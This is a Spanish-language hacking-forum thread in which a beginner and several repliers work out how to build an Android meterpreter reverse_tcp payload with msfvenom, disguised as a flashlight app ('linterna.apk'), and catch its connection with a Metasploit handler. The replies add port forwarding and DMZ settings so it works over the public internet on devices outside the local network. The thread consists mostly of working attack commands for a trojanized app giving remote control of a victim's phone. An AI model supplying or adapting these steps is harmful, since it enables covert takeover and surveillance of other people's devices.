elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Trabajando con las ramas de git (tercera parte)


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  DUDA: Colocar IP Publica en exploit de reverse_tcp (MSFVENOM)
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: DUDA: Colocar IP Publica en exploit de reverse_tcp (MSFVENOM)  (Leído 6,880 veces)
GreenTick

Desconectado Desconectado

Mensajes: 89


Texto personal?


Ver Perfil WWW
DUDA: Colocar IP Publica en exploit de reverse_tcp (MSFVENOM)
« en: 16 Junio 2016, 17:36 pm »

Hola a todos. Como he dicho en otro tema, y vuelvo a repetir  :rolleyes: estoy comenzando en esto de la seguridad informatica y soy muy principiante.  el caso es que he estado probando por primeravez esto de los exploits, y me ha surgido una duda. He estado probando un exploit y hay que colocar una IP y un PUERTO. La ayuda que he visto en internet, indica que colocan la IP local, no obstante, me surgio la duda, busque por internet, y me parecio leer que con la IP Publica tambien funciona, y asi puedes ejecutar el exploit en un dispositivo que no este en tu red local.
No obstante, he estado probando y no me ha funcionado. Me gustaria que alguien me respondiese si esto es posible, y tanto si lo es como si no, el por que (Nunca olvidemos que la base es el aprendizaje)

Os dejo los comandos del exploit para que me podais ayudar con mas facilidad. gracias.

Citar
msfvenom –p android/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 R > /root/linterna.apk

msfconsole

msf  > use multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.0.110
msf exploit(handler) > set LPORT 4444
msf exploit(handler) > exploit
En línea

8Noobs - Más que una comunidad; una familia.
www.telegram.me/proyecto8NOOBS

Ser humilde, significa entender que algún día podrás ver al de arriba bajo tus pies; y al que te esta lamiendo las suelas saltando encima tuya.
eag1eO9

Desconectado Desconectado

Mensajes: 2


Ver Perfil
Re: DUDA: Colocar IP Publica en exploit de reverse_tcp (MSFVENOM)
« Respuesta #1 en: 16 Junio 2016, 17:44 pm »

reverse_tcp_dns

https://www.rapid7.com/db/modules/payload/windows/meterpreter/reverse_tcp_dns

 :o


eag1eO9

MOD EDIT: No hacer doble post.
« Última modificación: 16 Junio 2016, 18:54 pm por MCKSys Argentina » En línea

windic

Desconectado Desconectado

Mensajes: 34



Ver Perfil
Re: DUDA: Colocar IP Publica en exploit de reverse_tcp (MSFVENOM)
« Respuesta #2 en: 16 Junio 2016, 18:26 pm »

Primero decirte que te vendría bien buscar algún libro de redes de computadores o sobre IPv4.

IP publica --------------> rango de direcciones IPs asignadas por los ISP cuando se contrata un adsl. Este rango de direcciones son administradas por la IANA. Son direcciones únicas en todo el rango de Internet.

IP privada --------------> rango de direcciones IPs asignados a equipos en una red privada por convención son los rangos 10.0.0.0/8 , 172.16.0.0/12 , 192.168.0.0/16. (esta convención esta desfasada por lo que puedes usar cualquier dirección)

Por otra parte has de saber que para cualquier programa la importancia de si la IP usada es la publica o la privada es nula, ya que los programas no distinguen entre unos tipos de IPs (si distinguen entre IPv4 e IPv6) y otros. El único al que le importa esto es a la arquitectura de tu red. Por lo tanto abría que ver que red usas para conectarte a Internet.

Suponiendo que tu red es la típica con un router el cual tiene asignada una IP publica y una privada y hace la conversión mediante NAT. Entonces Deberás abrir los puertos de tu router haciendo un PAT a la dirección privada de tu ordenador y también deberás poner tu dirección privada en el DMZ del router.
Código:
msfvenom –p android/meterpreter/reverse_tcp LHOST=(*tu ip privada o publica) LPORT=(port)R > /root/linterna.apk

msfconsole

use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST (tu ip privada)
set LPORT (port)
exploit


*Usar tu ip privada para redes local, usar tu ip publica para funcionar a través de Internet
En línea

reyo

Desconectado Desconectado

Mensajes: 2



Ver Perfil
Re: DUDA: Colocar IP Publica en exploit de reverse_tcp (MSFVENOM)
« Respuesta #3 en: 23 Junio 2016, 03:35 am »

hola amigo muy buenas comprendo que seas principiante y por eso te ayudare ; )
ya que yo tambien se lo basico pero te explicare absolutamente TODO muy bien resumido y sin muchas complicaciones ;D

En primer lugar copiare tu codigo y lo restificare paso a paso:

msfvenom –p android/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 R > /root/linterna.apk

msfconsole

msf  > use multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.0.110
msf exploit(handler) > set LPORT 4444
msf exploit(handler) > exploit


Lo que te resalte esta mal la primera escribiste mal la direccion ip de LHOST y asi no podra conectar, en segundo esa ruta es segun tu sistema yo e visto el video de donde la sacaste y ami esa ruta no me vale asi que pon tu una ruta de donde quieres ubicar el apk y por tercero y ultimo lugar es un consejo ;)
si lo llegas a usar en ip publica recuerda que tienes que activar los respectivos puertos en el router.
un saludo y espero que te haya ayudado.
EL MEJOR MAESTRO FUE DISCIPULO Y SI SOMOS DISCIPULOS LlEgArEmOs hA MaEsTrOs
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Duda sobre PS2 pekeña, colocar On-Line
Juegos y Consolas
Ponguito 4 1,915 Último mensaje 20 Abril 2006, 08:17 am
por Ponguito
Duda Sobre donde colocar post !!
Sugerencias y dudas sobre el Foro
pajo 1 2,703 Último mensaje 31 Enero 2009, 22:46 pm
por Jecth
Duda al colocar AdMob en aplicación Android
Java
clupin 0 2,483 Último mensaje 9 Abril 2015, 14:49 pm
por clupin
msfvenom...
Hacking
ceibe 2 4,817 Último mensaje 23 Junio 2016, 20:47 pm
por GreenArrow77
MSFVENOM/ android/payload/reverse_tcp
Hacking
sinpianwlr 1 3,594 Último mensaje 29 Julio 2018, 13:22 pm
por CybeRoot
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines